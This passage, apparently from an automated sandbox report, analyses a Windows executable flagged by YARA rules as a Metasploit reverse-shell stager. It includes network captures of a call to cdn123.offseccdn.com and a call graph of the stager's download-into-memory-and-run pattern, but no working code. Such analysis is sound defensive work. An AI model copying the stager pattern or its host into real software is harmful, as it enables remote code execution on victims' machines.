                          Mar 13, 2025 09:48:33.947597980 CET49683443192.168.2.974.82.86.0
                          Mar 13, 2025 09:48:34.067949057 CET49683443192.168.2.974.82.86.0
                          Mar 13, 2025 09:48:34.067984104 CET4434968374.82.86.0192.168.2.9
                          Mar 13, 2025 09:48:34.068376064 CET4434968374.82.86.0192.168.2.9
                          Mar 13, 2025 09:48:34.068433046 CET49683443192.168.2.974.82.86.0
                          Mar 13, 2025 09:48:34.071067095 CET49683443192.168.2.974.82.86.0
                          Mar 13, 2025 09:48:34.116317987 CET4434968374.82.86.0192.168.2.9
                          Mar 13, 2025 09:48:34.636802912 CET4434968374.82.86.0192.168.2.9
                          Mar 13, 2025 09:48:34.636934996 CET49683443192.168.2.974.82.86.0
                          Mar 13, 2025 09:48:34.636964083 CET4434968374.82.86.0192.168.2.9
                          Mar 13, 2025 09:48:34.637008905 CET49683443192.168.2.974.82.86.0
                          Mar 13, 2025 09:48:34.637648106 CET49683443192.168.2.974.82.86.0
                          Mar 13, 2025 09:48:34.637698889 CET4434968374.82.86.0192.168.2.9
                          Mar 13, 2025 09:48:34.637756109 CET49683443192.168.2.974.82.86.0
                          TimestampSource PortDest PortSource IPDest IP
                          Mar 13, 2025 09:48:31.420587063 CET4922753192.168.2.91.1.1.1
                          Mar 13, 2025 09:48:31.439805984 CET53492271.1.1.1192.168.2.9
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Mar 13, 2025 09:48:31.420587063 CET192.168.2.91.1.1.10x402dStandard query (0)good.comA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Mar 13, 2025 09:48:31.439805984 CET1.1.1.1192.168.2.90x402dNo error (0)good.com74.82.86.0A (IP address)IN (0x0001)false
                          • cdn123.offseccdn.com
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.94968374.82.86.04432820C:\Users\user\Desktop\443_2003_https-df.exe
                          TimestampBytes transferredDirectionData
                          2025-03-13 08:48:34 UTC346OUTGET /8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S HTTP/1.1
                          Host: cdn123.offseccdn.com
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Cache-Control: no-cache
                          2025-03-13 08:48:34 UTC198INHTTP/1.1 302 Found
                          Date: Thu, 13 Mar 2025 08:48:34 GMT
                          Server: Apache
                          Location: https://www.blackberry.com
                          Content-Length: 210
                          Connection: close
                          Content-Type: text/html; charset=iso-8859-1
                          2025-03-13 08:48:34 UTC210INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 61 63 6b 62 65 72 72 79 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.blackberry.com">here</a>.</p></body></html>


                          050100s020406080100

                          Click to jump to process

                          050100s0.0051015MB

                          Click to jump to process

                          • File
                          • Registry

                          Click to dive into process behavior distribution

                          Target ID:0
                          Start time:04:48:30
                          Start date:13/03/2025
                          Path:C:\Users\user\Desktop\443_2003_https-df.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\443_2003_https-df.exe"
                          Imagebase:0x140000000
                          File size:7'168 bytes
                          MD5 hash:8D9C0F42BAF129D1B430A01463DD7870
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown
                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown
                          Reputation:low
                          Has exited:true
                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                          Target ID:3
                          Start time:04:48:34
                          Start date:13/03/2025
                          Path:C:\Windows\System32\WerFault.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\WerFault.exe -u -p 2820 -s 1812
                          Imagebase:0x7ff6099a0000
                          File size:570'736 bytes
                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true
                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                          Execution Graph

                          Execution Coverage

                          Dynamic/Packed Code Coverage

                          Signature Coverage

                          Execution Coverage:34.2%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:12
                          Total number of Limit Nodes:1
                          Show Legend
                          Hide Nodes/Edges
                          execution_graph 52 140004161 InternetOpenA 53 140004186 52->53 59 140004245 HttpOpenRequestA 62 140004272 59->62 60 1400042f4 VirtualAlloc 61 140004319 InternetReadFile 60->61 61->62 62->60 62->61 63 140004347 62->63 54 14000424b HttpOpenRequestA 57 140004272 54->57 55 1400042f4 VirtualAlloc 56 140004319 InternetReadFile 55->56 56->57 57->55 57->56 58 140004347 57->58

                          Callgraph

                          Hide Legend
                          • Executed
                          • Not Executed
                          • Opacity -> Relevance
                          • Disassembly available
                          callgraph 0 Function_0000000140004161 1 Function_0000000140004245 2 Function_000000014000424B 3 Function_0000000140004000

                          Executed Functions

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000000.00000002.1160841015.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_140000000_443_2003_https-df.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocFileInternetReadVirtual
                          • String ID:
                          • API String ID: 3591508208-0
                          • Opcode ID: d12b91be1f377b51e2d5e9a127600f2aa2d3ef4ff5cd3ffab96600ccc3195469
                          • Instruction ID: 00beb425c6c815f18323cc53832ec41728588e8003292604363aacf73a5263bb
                          • Opcode Fuzzy Hash: d12b91be1f377b51e2d5e9a127600f2aa2d3ef4ff5cd3ffab96600ccc3195469
                          • Instruction Fuzzy Hash: E11125F130028959FB1393A7BE36BF911486B48FC4F894020BF055B6E2F9288690824C

                          Control-flow Graph

                          APIs
                          • HttpOpenRequestA.WININET(00000000,00000000,84A83200,00000000,?,00000000), ref: 000000014000426A
                            • Part of subcall function 00000001400042B6: VirtualAlloc.KERNELBASE ref: 0000000140004310
                            • Part of subcall function 00000001400042B6: InternetReadFile.WININET(00000000,00000000), ref: 0000000140004333
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000000.00000002.1160841015.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_140000000_443_2003_https-df.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocFileHttpInternetOpenReadRequestVirtual
                          • String ID: A$U.;
                          • API String ID: 1187293180-4043418643
                          • Opcode ID: b63501966926f8b01a0b9fc76b6447a0cee4866ebbb465211c8b40e6c4fe0d8d
                          • Instruction ID: be4982e0a486cb758df7c19ec863a11ba1af1556f481e9f2047e650850e32e87
                          • Opcode Fuzzy Hash: b63501966926f8b01a0b9fc76b6447a0cee4866ebbb465211c8b40e6c4fe0d8d
                          • Instruction Fuzzy Hash: A001F5F23002886DF712C6B7A921FBD2715B359FD0F8E5060BF055B6E2E9189A448209

                          Control-flow Graph

                          APIs
                          • HttpOpenRequestA.WININET(00000000,00000000,84A83200,00000000,?,00000000), ref: 000000014000426A
                            • Part of subcall function 00000001400042B6: VirtualAlloc.KERNELBASE ref: 0000000140004310
                            • Part of subcall function 00000001400042B6: InternetReadFile.WININET(00000000,00000000), ref: 0000000140004333
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000000.00000002.1160841015.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_140000000_443_2003_https-df.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocFileHttpInternetOpenReadRequestVirtual
                          • String ID: U.;
                          • API String ID: 1187293180-4213443877
                          • Opcode ID: 29627bb30cf452fdd34bce20e3faa6157c3b1128fe2c696f56fdbffadd6dbd22
                          • Instruction ID: 5f6e67efc3cbf756900b841172bea2473cedc1d77852a62045df7e1721ddbbb2
                          • Opcode Fuzzy Hash: 29627bb30cf452fdd34bce20e3faa6157c3b1128fe2c696f56fdbffadd6dbd22
                          • Instruction Fuzzy Hash: 0B0126F13002486CFB12C2B76D22FFD26587399FD4F8D5120BF064B6E2F9188A44410D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 32 140004161-140004181 InternetOpenA call 14000418f 34 140004186-14000419a 32->34
                          APIs
                          • InternetOpenA.WININET(00000000,00000000,00000000,00000000,?,00000000), ref: 000000014000417F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 00000000.00000002.1160841015.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_140000000_443_2003_https-df.jbxd
                          Yara matches
                          Similarity
                          • API ID: InternetOpen
                          • String ID: good.com
                          • API String ID: 2038078732-2365120828
                          • Opcode ID: 7253203620dcd85dad3777c5ea19a150f91156b95e1f59e9db5f4b304c0b6218
                          • Instruction ID: 0dc344e9eccd43810a061d402c5a282636e792987776bae9b9dd0be3df35d1d3
                          • Opcode Fuzzy Hash: 7253203620dcd85dad3777c5ea19a150f91156b95e1f59e9db5f4b304c0b6218
                          • Instruction Fuzzy Hash: 1EE0C2B31483C11BF35297A86B71BCD3B25AB17F44F089026AF4043282EA151AA4C105